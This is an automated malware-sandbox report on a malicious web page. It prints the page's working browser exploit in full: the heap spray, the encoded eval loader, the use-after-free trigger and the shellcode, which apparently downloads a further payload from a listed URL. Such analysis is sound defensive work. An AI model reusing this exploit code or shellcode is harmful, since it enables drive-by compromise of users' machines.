Analysis report for file 1aea206aa64ebeabb07237f1e2230d0f
Sample Overview¶
| File | ccc[1].ht_ (the `[1]` suffix and `.ht_` extension suggest a renamed browser-cache copy of an `.htm` page; unconfirmed from this report alone) |
|---|---|
| MD5 | 1aea206aa64ebeabb07237f1e2230d0f |
| Analysis Started | 2013-05-10 18:28:08 |
| Report Generated | 2013-05-10 18:28:12 |
| Jsand version | 2.3.6 |
Detection results¶
| Detector | Result |
|---|---|
| Jsand 2.3.6 | suspicious |
In particular, the following URL was found to contain malicious content:
- file://1aea206aa64ebeabb07237f1e2230d0f/
Exploits¶
Deobfuscation results¶
Evals (strings handed to `eval()` at run time, as captured by the sandbox; the entry below is what the `eval(cc)` call in the written page decodes to)
- (repeated 1 time)
var n = unescape("%u0c0d%u0c0d"); while (n.length <= 524288)n += n; n = n.substring(0, 524269 - sc.length); var x = new Array(); for (var i = 0; i < 200; i ++ ){ x[i] = n + sc; }
Writes (document content written dynamically, e.g. via `document.write()`, as captured by the sandbox)
- (repeated 1 time)
<html><script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 %ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8 %u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2 %ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f %udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7 %ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727 %u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6 %u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923 %ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2 %ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8 %u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8 %ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820 %udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8 %u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854 %ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84 %ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4 %ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153 %u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30 
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e %u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b %u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb %u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c %u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498 %ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0 %ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc %u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8 %u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038 %ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e %u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727 %u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703 %uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653 %udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5 %u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb %ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be %uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7 %ubcb9%ub2f6%ubfa8%u00d8"); var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280, 238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833, 728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364, 350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686, 805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 
350, 378, 399, 315, 805, 693, 322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833, 224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224, 735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637, 735, 651, 427, 770, 301, 805, 693, 413, 875); var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i < 200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = " \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d"; for (i = 0; i < x1.length; i ++ ){ x1[i].data = p; } ; var t = e1.srcElement; } </script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>
Network Activity¶
Requests
| URL |
|---|
| file://ccc[1].ht_ |
| file://1aea206aa64ebeabb07237f1e2230d0f/aaa.gif |
ActiveX controls¶
Shellcode¶
| Hexadecimal | ASCII |
|---|---|
90 90 eb 19 5b 4b 90 33 c9 90 80 7b 01 e9 75 01 c3 66 b9 7b 04 80 34 0b d8 e2 fa eb 05 e8 e2 ff ff ff 31 39 db d8 d8 87 bc 79 e8 d8 d8 d8 53 98 d4 53 a8 c4 75 53 b0 d0 53 2f b2 d7 81 30 59 db d8 d8 48 3a 20 b0 eb ea d8 d8 b0 8d ab bd aa 8c 53 9e d4 30 37 da d8 d8 53 30 b2 d9 81 30 b9 db d8 d8 3a 21 b0 b7 b6 d8 d8 b0 ad aa b4 b5 8c 53 9e d4 30 08 da d8 d8 53 30 b2 d9 81 30 9a db d8 d8 3a 21 b0 b4 eb ea d8 b0 ab b0 bd b4 8c 53 9e d4 30 69 da d8 d8 53 30 b2 d9 81 30 fb db d8 d8 3a 21 59 34 d8 d9 d8 d8 53 04 59 1b 58 d8 d8 d8 b2 d8 b2 c2 8b b2 d8 27 8e 9c eb 18 98 58 e4 db d8 ad 21 51 5e 48 d8 d8 d8 1f dc db 84 b9 f6 bd 1f 9c db dc a0 bd d8 d8 eb 11 89 89 8b 8f 89 eb 18 53 9e 98 30 86 da d8 d8 5b 20 d8 d7 5d a7 d9 d8 d8 b2 d8 b2 d8 b2 db b2 d8 b2 da b0 d8 d8 d8 18 8b 53 9e fc 30 e5 da d8 d8 5b 20 27 d7 5c 86 d9 d8 d8 51 9e b8 b2 d8 88 27 8e f0 51 9e bc 53 5e 48 d8 d8 d8 1f dc db 84 ba f6 bd 1f 9c db dc a0 bd d8 d8 b2 d8 b2 d8 b2 da b2 d8 b2 d8 b0 d8 d8 d8 98 8b 53 9e fc 30 23 d9 d8 d8 5b 20 27 d7 5c c4 d9 d8 d8 51 5e 5c d8 d8 d8 51 46 54 d8 d8 d8 53 9e b8 b2 d8 b2 d8 b2 d8 53 9e b8 88 27 8e e0 1f 9e a8 d8 d8 d8 d8 1f 9e ac d8 d8 d8 d8 59 1f d8 da d8 d8 eb 03 53 86 bc b2 d8 55 9e a8 88 b0 d8 dc d8 d8 8f 27 ae b8 27 8e dc eb 11 61 d8 dc d8 d8 58 a4 d7 27 4d ac d4 58 a4 d7 27 d8 ac dd 58 ac d7 27 4d 3a 33 53 1b f5 d8 dc d8 d8 5b 20 d8 a7 db 51 86 a8 b2 d8 55 9e ac 88 27 ae a8 8f 27 6e 5c d8 d8 d8 27 8e e8 59 33 d8 dc d8 d8 5b 23 d8 a7 7d 27 ae b8 27 8e ec 27 6e 5c d8 d8 d8 27 8e ec 53 5e 48 d8 d8 d8 53 46 54 d8 d8 d8 1f dc db 84 b9 f6 bd 8b 27 8e f4 53 66 54 d8 d8 d8 53 5e 48 d8 d8 d8 1f dc df 84 ba f6 bd 59 34 d8 d9 d8 d8 53 04 b0 d8 d9 d8 d8 8b b0 d8 d9 d8 d8 8f b2 d8 b2 d8 27 8e c4 53 23 eb 18 eb 03 59 34 d8 da d8 d8 53 14 5b 20 8c a5 d0 51 c4 d9 5b 18 dc 33 2b 53 14 53 01 5b 1b c8 eb 18 88 89 8b 88 88 88 88 88 88 8f 88 88 53 9e d0 30 2f d8 d8 d8 53 a6 e4 30 ec d9 d8 d8 30 ef d8 d8 d8 b0 bb ae af d8 b0 ab b0 bc b7 8c 53 9e d4 30 6e d8 d8 d8 51 9e e4 bc 79 dc d8 d8 d8 
55 78 b8 27 27 27 b2 bd 27 ae e4 53 9e c8 30 42 d8 d8 d8 eb 03 8b 8b 8b 8b 27 08 30 3d d8 d8 d8 59 34 d8 d9 d8 d8 53 24 5b 1f dc 1f df ea ac 49 d4 1f 9f dc bb 51 09 97 1f 9f d0 78 bd 4f 13 1f 9f d4 89 98 62 a7 1f 9f c8 e6 c5 6e e1 1f 9f cc 60 b1 0c c3 1f 9f c0 66 a7 be 78 1f 9f c4 24 71 ef 75 1f 9f f8 40 d2 c8 20 bc 79 e8 d8 d8 d8 53 98 d4 53 a8 c4 75 53 b0 d0 53 2f 51 8e bc b2 dc 81 30 7b d8 d8 d8 48 3a 20 b0 eb ea d8 d8 b0 8d ab bd aa 8c 53 de 30 ca d8 d8 d8 53 30 b2 dd 81 30 5c d8 d8 d8 3a 21 eb 27 8f 27 8e dc 58 e0 30 58 e0 31 ad c9 59 a0 dd 48 48 48 48 ac d0 53 27 8d 53 34 55 98 dd 27 38 30 e0 d8 d8 d8 1b 58 e0 30 58 e0 31 ad c9 59 a0 dd 48 48 48 48 ac 3f b0 d0 d2 d8 d8 55 98 dd 27 38 30 cf d8 d8 d8 1b 30 c9 d8 d8 d8 60 c9 d9 dc 58 1a d4 d8 33 da 80 1b 30 21 27 27 27 83 1e df 60 51 87 d9 be 1f 9f dd 27 38 1b 8b 53 04 8b b2 98 b0 d8 c8 d8 d8 8f 53 9e f8 30 5e 27 27 27 80 1b 89 8e 53 ad e4 53 ac f6 a0 db 2d 8e 53 ae f8 db 2d eb 11 91 99 75 db 1d eb 03 d7 66 c8 e2 0e ac d0 19 13 df db 02 98 33 29 e3 c7 ad 3f 86 53 86 fc db 05 be 53 d4 93 53 86 c4 db 05 53 dc 53 db 1d 73 86 81 1b 30 c2 24 27 27 6a 2a 3a 2c 6a ee d7 cb 28 90 a3 e5 ea ac 49 d4 5d 07 77 63 bb 51 09 97 89 98 62 a7 df 4a fa a8 c6 7c bc 37 4b ea 3c 4c 56 cb d2 74 a1 e1 3e 40 1c 55 c7 ac 8f be d5 27 9b 66 74 03 40 d2 c8 20 58 0e 77 42 23 8b cd be b0 ac ac a8 e2 f7 f7 bc bd b5 b7 e9 f6 be ac a8 b9 bb bb bd ab ab f6 bb bb f7 bc bd b5 b7 f7 b9 bc f6 b2 a8 bf d8 00 |
....[K.3...{..u.
.f.{..4.........
..19.....y....S.
.S..uS..S/...0Y.
..H:............
S..07...S0...0..
..:!...........S
..0....S0...0...
.:!...........S.
.0i...S0...0....
:!Y4....S.Y.X...
.......'.....X..
..!Q^H..........
................
.S..0....[...]..
................
..S..0....[.'.\.
...Q.....'..Q..S
^H..............
................
....S..0#...[.'.
\....Q^\...QFT..
.S........S...'.
...............Y
.......S....U...
......'..'....a.
...X..'M..X..'..
.X..'M:3S......[
....Q....U...'..
.'n\...'..Y3....
[#..}'..'..'n\..
.'..S^H...SFT...
........'..SfT..
.S^H..........Y4
....S...........
......'..S#....Y
4....S.[....Q..[
..3+S.S.[.......
.........S..0/..
.S..0....0......
.........S..0n..
.Q...y....Ux.'''
..'..S..0B......
...'.0=...Y4....
S$[......I.....Q
.....x.O......b.
.....n....`.....
.f..x...$q.u...@
....y....S..S..u
S..S/Q.....0{...
H:............S.
0....S0...0\...:
!.'.'..X.0X.1..Y
..HHHH..S'.S4U..
'80.....X.0X.1..
Y..HHHH.?.....U.
.'80.....0....`.
..X...3...0!'''.
..`Q......'8..S.
.........S..0^''
'....S..S....-.S
...-....u.....f.
..........3)...?
.S.....S..S....S
.S..s...0.$''j*:
,j...(.....I.].w
c.Q....b..J...|.
7K.<LV..t..>@.U.
....'.ft.@...X.w
B#..............
................
............ |
This shellcode was found on file://1aea206aa64ebeabb07237f1e2230d0f/.
(shellzer's analysis not available: an error was encountered when analyzing this shellcode.)
Reviewer note: the first 0x22 bytes of the dump read as a small self-locating decoder stub (a `call`/`pop ebx` pair to obtain its own address, then `xor byte [ebx+ecx], 0xD8` in a `loop` over 0x47B bytes), so the remainder of the dump is XOR-0xD8 encoded rather than plain x86; decoding the tail by hand appears to yield the URL listed under Malware below. This is a manual reading of the hex, not tool output — confirm with a disassembler before relying on it.
Malware¶
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://demo1.ftpaccess.cc/demo/ad.jpg | N/A | N/A | (not available) |